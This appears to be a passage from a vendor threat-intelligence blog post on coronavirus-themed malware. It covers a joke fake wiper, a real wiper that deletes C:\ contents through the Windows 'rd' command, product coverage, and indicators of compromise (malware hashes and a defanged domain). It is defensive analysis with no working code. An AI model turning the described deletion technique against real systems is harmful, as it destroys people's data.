During the course of the investigation, we came across several samples that appeared to be malicious and were tagged as malicious in various engines but were, in fact, odd jokes or non-malicious content, including a fake wiper. This file was found with the suspicious filename of "CoronaVirus.exe" of which there were many. This particular one immediately appeared to lock the screen upon execution.

The rough translation of the text displayed to the user is "Deleting all files and folders on this computer - Coronavirus." Upon completion of the counter, the button at the bottom became clickable, and when clicked, displayed the following message:

This says it is a joke and the user can press Alt + F12 to exit. If the user pushes these buttons, it drops you back at the desktop. Upon further analysis, it does not appear there were any other malicious actions taken. This is just one of several odd examples found in our research including another joke game written in VBS and an odd executable wrapper of a well-known outbreak map for coronavirus. None of these files were malicious but did take actions that could be viewed as malicious, as such, we have seen many antivirus vendors detect these as malicious executables. At the very least, they are unwanted applications, albeit not inherently malicious.

One additional malware sample we discovered was a wiper designed to destroy infected systems. It was initially submitted to various malware repositories with the filename "冠状病毒.exe" which translates to "coronavirus." The malware, when executed on systems, uses several techniques to delete data from both the file system and registry in an attempt to disrupt system operations. For example, we observed the malware invoking the Windows Command Processor and using the "rd" Windows command to iterate through the directory structure of the C:\, deleting the contents:

It is important to note that there is no prior attempt to copy, exfiltrate, or save a copy of the contents and the malware does not appear to make any attempt to extort victims or otherwise generate revenue for the malware author.

Conclusion

Malicious actors are always going to do whatever they can to increase infection rates and in turn increase revenue, this includes using the news and fear to achieve their goals. This is one of the cases where both news and fear can be used. In a world where threats like Emotet are stealing emails and replying in-line users need to be increasingly skeptical of all attachments regardless of source. These attacks can be seen in an email thread with a colleague or friend and, in some cases, may come directly from that colleague or friend. Additionally, anything news related should be treated with a little extra skepticism, go out and do your own research instead of just clicking links and opening documents that are sent your way.

Coverage

Ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware detailed in this post. Below is a screenshot showing how AMP can protect customers from this threat. Try AMP for free here.


Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), Cisco ISR, and Meraki MX can detect malicious activity associated with this threat.

Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Additional protections with context to your specific environment and threat data are available from the Firepower Management Center.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of Compromise (IOC)

Hashes (SHA256)

345d8b4c0479d97440926471c2a8bed43162a3d75be12422c1c410f5ec90acd9 (Parallax RAT)
Adde95e8813ca27d88923bd091ca2166553a7b904173ef7a2c04bb3ddf8b14a9 (Wiper)
C57fa2a5d1a65a687f309f23ca3cfc6721d382b06cf894ee5cd01931bbc17a46 (Nanocore)

Emotet Maldocs (SHA256)

006dc4ebf2c47becdc58491162728990147717a0d9dd76fefa9b7eb83937c60b
0a84308348fee6bbfe64a9ef23bb9c32cb319bcdf5cf78ddfda4a83dadea4b8e
0a8aa3f413a8989bb89599dfc2404f7d34dfbb2e3ce26e900d228e9e8c8908b8
0fdc97da1c297e6fef93910008fc5c47cbdcd3e2987bc163467b34f56de112ff
11b4519b76957b0758381f8e19c5e15d8744f7974716642aeb586c615dde38fa
140da6b610a45f84c6438207ab11942d79eb37831551810f87baae80cfff4593
1c3532d143212078e204d0f81a782deacd58e8f0e7253472e0509491fd1e5201
1e4b01e3e146ff01a3782b01680a5165432af556331d599ec6ad35b4983b216f
2037c7cc809ed3eddd1338d2bec6266cdb449dbf8ff3510fd360a08d229d4f40
21182b7834a7e13033be7b370a68b3d3639f4cae12fe80e2a908404cbd4cd324
2437ef90b60cf3d6bd0c3eebf3f41ed1e403bc31b024b52b0f41ec648d80a583
257afe9f4d7b282b1c0b2f3ebb7e1e80e96c8e0214f1b80ea2b7b636a4e7747d
2bcd35bfb7e4dbdbbf64fce5011199947794425093be7bc74829bfeadb89f0a3
2c9c1e04d806ad8890dd6bf4477efb4ea6c78b8185a9996876bcaea568a04e70
2e47f37bef4dea338e366ce30fe54888e5aaa2d47a5c0db4a3c3e9e5c25f8ace
2f3ee4688a31c8d249b8426f46e392d9c55b85bfad9fb31fb362eb32d38bd9b3
31cb82cd750af6af9ecf369fd26d47dc913f6b56be6ea12b10fe6dd90ef1b5df
32753598f94412fe3dc382dc12dcf2edf7881d9f07814c82aeec36481b9362b5
3386dc7dc67edd5e84244376b6067e3767e914a1cc1fc7fd790a6aa68750a824
37354a04f6d423809602e198e590469173cc8e930cc7fdd4da2c2072977251e9
3981d933de93f55641fdf8cfe980e40a0bf52ce8b022735e8ebc4f08cbb19104
39c17475bdb019010453085830e7f8aa1ef41ca182982491306fcf75166b8e08
3a7a8518b41dd6c05289a08974c95a0038be4e5d1b0588edfd0589fcf22b0c8f
3cd099efe4cb426fdc6276380c224b5478d0841c5c44d2c0a088d039d529d258
3fc33b537fb38e1f586ddb3ebbbe152458dcde336c2f26da81d756e290b5ef00
46f81af256c630969f55554ea832037bc64df4374ec0f06ac83a1c4b89869314
49cfa1b3cbe2bf97079c0dd0a9f604e3f2e7d9fbb6d41128a9889e068aa884f6
4a272dd4a5c6261e983d667dd676875054dd4a4ea11620f16c553fcfd2c44861
501cc107e410b245d1b95b64ae0afdae758375b4b3724acfda44041bad963232
50a3bea4b9686bcf5cac144d4fc18aa178f66c8368205f9065cd1d9a2c41f026
51f0e9b151bde97ebeb813d6eed8a11f02551a6530049f53dc29fc1a20b6699d
587840d28f2585dd5207731d7fda86a0966c82fa592a26f9148b2de45526db55
5b7db5046ba22a6242d5ff6e8f538ad43bba53810117d5eb8f023215aad26e6b
5e20a0ab563950eab76c023101b1dd374becac2a5149a74320b23b59a7f16256
698eb726345c71eca7b4a531bfa76ab6e86ef100f943a727fb5866a84ec79289
6c34cca35d98e464c2f74abd9be670c7f8f707f37cd3f0fd4746c49f8fcf6b07
722a60dfd59a595daa487f2fb759ef6f9ccaabcdf20605d5ae9450cba4a9b9b2
78cf7ea3c1da98941e164f4ac3f75b57e9bce11467bc5a6c6877846f1adcf150
7a97fc7bdd0ad4ef4453c2e52dd8f44dee9b4e91ff3b5518e311ef1ebac3b667
7a9f249978c959e1f11f2992a8ce4a70ba333c8dbdc2638c780bbbe62de4808e
7cbcad4d6e9ad8438e5febd3830bff9aef4729b98d23935ad7f9e6d290272732
7cf8f24d7e8b1e2f63bfa7a18cd420a03fff44126e80aed8cb90fba3c4e986ac
80ee20c604d5d4b51a30dc21da271651f3c085c40281e3ff3e2ee0175d2ca98d
80f8877406e899c6274331aa991b8d1f4f087e3233c36d39fbaebb729c294899
89a0147dec8d6838f14815b577ae41dbcf54953c66e7f5f999ab91fea6ec08fa
8a724fc60bde738694779751d6c63a7ed1caa03518b8f26b9acb36d5c1b29930
8c0a8d6876a6c7fe44962883561d9f48615ee67f4544872ec98f47edcf516509
8f91d27d3a59c08ab4c453b2679f4620696ba67c56280a4c3757368acb20aad3
90c3d8d13ea151bce21a1f4b842d0ed4eaff09842b23311b2326cf63957fc2b2
92af9c8c539ff9f99f79cce8453b1c483d117c095e2e0ffe384d96e35f72dc8b
9367f3ea7460ae40ca69d41398327f97136a93656ef5fad1285a0b82f81522a4
980de93ad93ecaabc048c9fcc9d62e43eeb32f216c4177963cf1bd94ad53074b
9d58ca5383fef5dc837ca9d4251d247bed4ead4a6b90a9aae30568be80e20543
9e4cb963e509fbde6de003a81a3e19cfc703be1c41d20f4b094a0fa89d6ad02c
9f27a826b4b873c9ea23e023f54d5291a50004d67dd5fe64d1f8c8e8b51b74e3
a080d763c60efd4ef2781ad3090c997d1092ac726707366d92d647f26ee2965f
a286e3be694b9525530ec6a65b71a8a91e04042c3471e8a9e440f503fe8ce995
a537c75de9a95be0c071fd6437cbaf3696752f02c3cd5afa1c9cc47c4c755f75
aa6ceb17ced471e1695c99c0718bc24c710311f0daa256cb0783d82218d772c9
ac416780fa4aa340fff2787e630351c5813faceb823424817eb10e82254b785d
b04584ee8b3ba565541cb0f4d8787ed6e8942b6bdec5b1acdc03488b93aeb3cb
b14d70827d5d668aeb31e94be512fea9fb38ead8ec12cdf7617616801c76b6e9
b283e4f841e328f0cc12ebdf76aafb819ebadba7df863681994b69697731cf96
b34f4ec4ae8d66b030f547efe3acc2a71c9ab564f78aac68719ec91dab613bb3
ba4297978b6a6b5fe2b66c32ead47bbd1f2e2f549beed5cd727eb9ae3fed6b6a
bdcef0f16c70086414ff95b69fdbbe7eb0c9814308d3d60143b6c04dfc077257
bf178911f2c063c9592020652dc22076d02ca87d14a7ed7862074d334470ae32
c135f36d3346699e6d2bf9f5f5f638fd9475c0b12144a15a0652b8f1ebb25c12
c6dc408d60c2354a13e835bf826300a6d5258b72b8826e8c46d946cbc1f0b455
c9d3c250ab6d8535b7a4114a1e9545f0b9bc24e4e277640c59b7555f38727885
cba1c3070f76e1a2705afee16bd987b6a8ffa45900cab8cf3b307f60a7b89ac9
cc2507ddd53a6f00265f3be51d7217def786914bd1d700ec3c74a2a7107b3476
d765980228492758a11e534e45924311aef681cb5859f701cd457b6b871c2d06
d8183919d675978d58cd1f134768f88adeea9ce53b167c917e54fff855c6d9f9
da87521ecc146a92a7460a81ebb5ca286450f94c8c9af2a4b3c6c8a180d421c5
dbcef5c217a027b8e29b1b750c42a066650820a129543f19364bcb64ac83bc07
dc66811ce189240c510733be9e1a2175079dddb80ebf02faaa044fce1f7134d0
e17dca7c2c05139fc81302e76e0e9aaa29368b60cb147208cbcb5c8df113f6f6
e250d977e47e7809086dd35a2767f9ef557591dd00e9ce96ef4071e4f0d8c670
e32cca6446f2ddd8430400b16fc171ab3163cf8222669d7d9144e9c85904d5f5
e382ee1ce9d99f4e8e18833bac121c14ee2e5dc29a8b5382ca5b4eda9db7f1aa
e55efa92d87484cf6b251f2302a0c0c7650acd7ea658bf9997bf761b64fe472a
e8221acccdb8381b5da25a1f61f49dda86b861b52fafe54629396ed1e3346282
ea3a0a223474592635d1fb7a0731dd28a96381ad2562e3e064f70e2d4830c39d
eab14b1bfa737644f14f7bb7ace007d418230285364e168e35bd718a6517b316
f2a2bea86ce1a4803345b4aa46824c25d383a0b40b10bb69e528c72305552a2a
f6879431b901df789082452c1c4ffa29e857d247886e421df6dda5fb3d81ca5e
f7209d1099c75acccbef29450271d821fd78ad52176f07aa8a93a9e61e9eaa7f

Domains

vahlallha[.]duckdns[.]org